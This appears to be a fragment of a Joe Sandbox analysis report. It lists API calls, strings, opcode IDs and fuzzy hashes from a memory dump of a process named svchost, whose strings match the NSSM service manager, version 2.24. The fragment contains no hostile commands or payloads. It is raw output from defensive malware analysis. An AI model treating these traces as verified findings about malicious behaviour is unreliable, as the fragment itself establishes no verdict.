                                                    • Instruction Fuzzy Hash: 8F313EB2A001007BD6109B766C45FAB775CDE85379F44053BFB58C3252EA28D885C67E
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: P%B$`'B$$B
                                                    • API String ID: 3494438863-3853432223
                                                    • Opcode ID: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
                                                    • Instruction ID: 1080d359621281dac9eb6ef5654e348f9a9ff66b954d09d266db2da5be3808d7
                                                    • Opcode Fuzzy Hash: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
                                                    • Instruction Fuzzy Hash: 3A11E73130461167E7348A2E7EA07E62393FB98324B94813FE601C73D0EAB8D8D3864C
                                                    APIs
                                                    • __getptd.LIBCMT ref: 00416100
                                                      • Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
                                                      • Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441
                                                    • __getptd.LIBCMT ref: 00416117
                                                    • __amsg_exit.LIBCMT ref: 00416125
                                                    • __lock.LIBCMT ref: 00416135
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                    • String ID: x/B
                                                    • API String ID: 3521780317-795736107
                                                    • Opcode ID: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
                                                    • Instruction ID: d97fba921eb6448607c153e5393f7921dba5c81f8b41dce901700528dcdb7151
                                                    • Opcode Fuzzy Hash: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
                                                    • Instruction Fuzzy Hash: DDF06231900210ABD620BB6995027CD73E0AF44729F52811FA58097393CB2CD9818A5E
                                                    APIs
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000EBA0,?,00000000,00000000), ref: 0040F356
                                                    • GetLastError.KERNEL32(00000000), ref: 0040F361
                                                    • RtlWakeConditionVariable.NTDLL(?), ref: 0040F3D7
                                                    • SetServiceStatus.ADVAPI32(?,?), ref: 0040F45A
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConditionCreateErrorLastServiceStatusThreadVariableWake
                                                    • String ID:
                                                    • API String ID: 1631654564-0
                                                    • Opcode ID: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
                                                    • Instruction ID: bb6d87cbd09c4234cba0dee68d7b7d15a758b73580d713f38b937c70a6fac446
                                                    • Opcode Fuzzy Hash: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
                                                    • Instruction Fuzzy Hash: 544196F2904700EAE774DB64EC4AB9777A89B54304F004D3EF24EA71C2D67DB8558B68
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041192C
                                                    • HeapFree.KERNEL32(00000000), ref: 00411933
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
                                                    • Instruction ID: 95e30e043aeee65d45f2ad13466b3714bbfccf5d3bd7e18b30c1f789b8d743ce
                                                    • Opcode Fuzzy Hash: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
                                                    • Instruction Fuzzy Hash: 802156B5A043006FD700DBA9DC85F9B77E8EBC8714F444A69F958C7290D678ED48C762
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0041160C
                                                    • HeapFree.KERNEL32(00000000), ref: 00411613
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
                                                    • Instruction ID: b959b81e1fe3a2bafc76a74eee7c013ba47a19e295bb6f17c30615ef93d79162
                                                    • Opcode Fuzzy Hash: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
                                                    • Instruction Fuzzy Hash: 7A2156B5A043006BD600DBA9DC85F9B77E8EBC8714F444A6DF958C7290D678ED08C766
                                                    APIs
                                                    • __lock.LIBCMT ref: 004141AE
                                                      • Part of subcall function 004145CC: __mtinitlocknum.LIBCMT ref: 004145E2
                                                      • Part of subcall function 004145CC: __amsg_exit.LIBCMT ref: 004145EE
                                                      • Part of subcall function 004145CC: EnterCriticalSection.KERNEL32(?,?,?,0041267D,?), ref: 004145F6
                                                    • ___sbh_find_block.LIBCMT ref: 004141B9
                                                    • ___sbh_free_block.LIBCMT ref: 004141C8
                                                    • HeapFree.KERNEL32(00000000,?,00420330,0000000C,00416422,00000000,?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C), ref: 004141F8
                                                    • GetLastError.KERNEL32(?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C,004145E7,?,?,?,0041267D,?), ref: 00414209
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2714421763-0
                                                    • Opcode ID: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
                                                    • Instruction ID: 78ddf74b6f23589f7df2c05dcf936a3b5e981393fab6882f78671dd489d308d8
                                                    • Opcode Fuzzy Hash: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
                                                    • Instruction Fuzzy Hash: A8018F31E41201AADB306BA29C0ABCE7BA49F81769F51425FF404A6191CB7C8AC1CA9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: kill_process
                                                    • API String ID: 0-4017559064
                                                    • Opcode ID: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
                                                    • Instruction ID: 00686baf9cae64c418d2207327e1e792f3237e2728e58617ed409f1897315a47
                                                    • Opcode Fuzzy Hash: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
                                                    • Instruction Fuzzy Hash: 53317675504300AED711DA29AC45BE7B7D8BF84718F44893EED98622C1E3BCEA18C697
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32 ref: 0040B280
                                                    • __snwprintf_s.LIBCMT ref: 0040B2A9
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    • GetLastError.KERNEL32(00000000), ref: 0040B2CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterErrorLastQueryRegisterReportValue__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %lu
                                                    • API String ID: 2741730872-685833217
                                                    • Opcode ID: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
                                                    • Instruction ID: 9b57c4e92f1354976d5d0f2d51147bf8e68e588caea2cac463da8bdf8903c173
                                                    • Opcode Fuzzy Hash: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
                                                    • Instruction Fuzzy Hash: 911190B1504300AFD210DB55DC4AFAFB7E8EB8D718F40492DF649A6281D674E944CBAB
                                                    APIs
                                                    • __snwprintf_s.LIBCMT ref: 0040880C
                                                      • Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748
                                                    • RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,00000000), ref: 0040884B
                                                      • Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                      • Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                      • Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeleteDeregisterRegisterReportValue__snwprintf_s__vsnwprintf_s_l
                                                    • String ID: %s%s$delete_createfile_parameter()
                                                    • API String ID: 1707313777-3045456684
                                                    • Opcode ID: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
                                                    • Instruction ID: d1234627bce7d3409ed959c761f7b8d746fd5414b944bb09aaf7c4e8fca72bae
                                                    • Opcode Fuzzy Hash: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
                                                    • Instruction Fuzzy Hash: 6201DFB2A142006FE700A759CD02FEFB7E8AB99714F80051EF615D72D1F5B8A8818BD6
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
                                                    • ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
                                                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00405460
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Event$Source$DeregisterRegisterReport
                                                    • String ID: nssm
                                                    • API String ID: 3235303502-2602286837
                                                    • Opcode ID: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
                                                    • Instruction ID: d3648bf1d166a2bd8de7c6c9c4a863b798114447eb191853c28b7c632e5ffc8e
                                                    • Opcode Fuzzy Hash: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
                                                    • Instruction Fuzzy Hash: D8F0A4B0505711ABE714DB04DC19BFBBBA5EF88705F40842CF542EA2C0D774D9418F9A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LocalSystem$NT Authority\LocalService
                                                    • API String ID: 0-2498893882
                                                    • Opcode ID: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
                                                    • Instruction ID: 5088a37f203b1a9eb05045d2fec1edf7ec2d004d2db4fae365a24f9b45aa7680
                                                    • Opcode Fuzzy Hash: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
                                                    • Instruction Fuzzy Hash: 35E0483179452A62DB212B2CBC05FD727995B45742F448073B450DB1D2D75CCDC352ED
                                                    APIs
                                                    • ___addlocaleref.LIBCMT ref: 004160C8
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FA0
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FAD
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FBA
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FC7
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FD4
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FF0
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(00000000), ref: 00416000
                                                      • Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00416016
                                                    • ___removelocaleref.LIBCMT ref: 004160D3
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(004178FE), ref: 00416037
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83000001), ref: 00416044
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(B9C972C2), ref: 00416051
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B660AC2), ref: 0041605E
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 0041606B
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 00416087
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83C0B70F), ref: 00416097
                                                      • Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(000009B2), ref: 004160AD
                                                    • ___freetlocinfo.LIBCMT ref: 004160E7
                                                      • Part of subcall function 00415E45: ___free_lconv_mon.LIBCMT ref: 00415E8B
                                                      • Part of subcall function 00415E45: ___free_lconv_num.LIBCMT ref: 00415EAC
                                                      • Part of subcall function 00415E45: ___free_lc_time.LIBCMT ref: 00415F31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                                    • String ID: x/B
                                                    • API String ID: 467427115-795736107
                                                    • Opcode ID: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
                                                    • Instruction ID: b34a0f9879d2699f7ffcf6201956a3b00b8b15cae77dc86b8d387886a1ceb3e8
                                                    • Opcode Fuzzy Hash: d1c564f02e998aee3c3fa80c54e1f8df227aa337fe82c91f75564be1846c7342
                                                    • Instruction Fuzzy Hash: C7E04F33B019315B8A36AE1D64406EB9A948FCA715F1B41AFF844A7784DF2CCCC154AD
                                                    APIs
                                                    • GetConsoleWindow.KERNEL32 ref: 004098D0
                                                      • Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
                                                      • Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ConsoleFreeLocalWindow_vfwprintf
                                                    • String ID: 2.24$2014-08-31$32-bit
                                                    • API String ID: 1334155653-2354707097
                                                    • Opcode ID: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
                                                    • Instruction ID: c76862b1d953f522f71d38d82470cec42d68d54e25fb047d8ef406d997cf9da4
                                                    • Opcode Fuzzy Hash: 990dfce23d7a97a5039eabe4122512bd76cb627f2bc899cb7b24c49a62b2ecd3
                                                    • Instruction Fuzzy Hash: 01D0C2F0A8460137E600AA598C07F8B22409B8470DFC4006AB606A52D2D67CF8944A5D
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041A8E7
                                                    • __isleadbyte_l.LIBCMT ref: 0041A91B
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,?,00000000,00000000,?,?,?,?,00412F07), ref: 0041A94C
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00412F07,00000001,00000000,00000000,?,?,?,?,00412F07), ref: 0041A9BA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
                                                    • Instruction ID: 8e80b7d0e863ddd762db141ba23fd8d99fbbd19addded7427a642c387e288d34
                                                    • Opcode Fuzzy Hash: 7d0f7be5522bebe04898bb7a1b5b17ac1f2cd60f464c80a5787e493e5f5524ec
                                                    • Instruction Fuzzy Hash: 54311370A12245EFDB20EF64C884AFE3BA4BF01310F1589AAE4619B291D334DDE1DB56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: get_service_username()$username
                                                    • API String ID: 0-1118073074
                                                    • Opcode ID: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
                                                    • Instruction ID: 7d16268e7706c02599106e4441dc23a9752c8f6b5ec33a58098762b0a8250c8b
                                                    • Opcode Fuzzy Hash: 784faa349208341f158178e86dc57be783a71b656f02ec290f582de94d1f2833
                                                    • Instruction Fuzzy Hash: DE1106B6A003015BE710EFA9EC85B9773A8EF84304F048476F91CDB381E379E8588768
                                                    APIs
                                                    • SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 004050E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004050F1
                                                    • HeapFree.KERNEL32(00000000), ref: 004050F8
                                                    • SetEnvironmentVariableW.KERNEL32(?,00000000), ref: 00405106
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentHeapVariable$FreeProcess
                                                    • String ID:
                                                    • API String ID: 1651283563-0
                                                    • Opcode ID: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
                                                    • Instruction ID: 7ca8f0decbef4ebefa15ff84fd483d82a394ef1ad15d6eda22774f96b67548aa
                                                    • Opcode Fuzzy Hash: b44acf5573aec65a98221271f6012cacc703a2aca283ef703b0ef0abf04c4004
                                                    • Instruction Fuzzy Hash: 26117F71C047169AD730AF549C0575BB3F8EF94310F54883BE989A72C1F3B898D48B9A
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00404F26
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00404F2D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID: copy_environment_block()$environment
                                                    • API String ID: 1617791916-2686971372
                                                    • Opcode ID: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
                                                    • Instruction ID: 8deebacdc600d522f7aab138bb3d98dce45cd337f056f7d9729cf224169f9fdd
                                                    • Opcode Fuzzy Hash: c3fd064e4f0a956d187f24e7c5e8a9bb3822476e50573aa05cb750d222029aa4
                                                    • Instruction Fuzzy Hash: 1A01FCF66046221AD6212618BC50BF72298DFD0769B11443BFA82E71C5EA78CC8141A8
                                                    APIs
                                                    • GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040147C
                                                    • GetSidSubAuthority.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 00401491
                                                    • LsaFreeMemory.ADVAPI32(00000000), ref: 004014F1
                                                    • LsaFreeMemory.ADVAPI32(00000000), ref: 004014FB
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
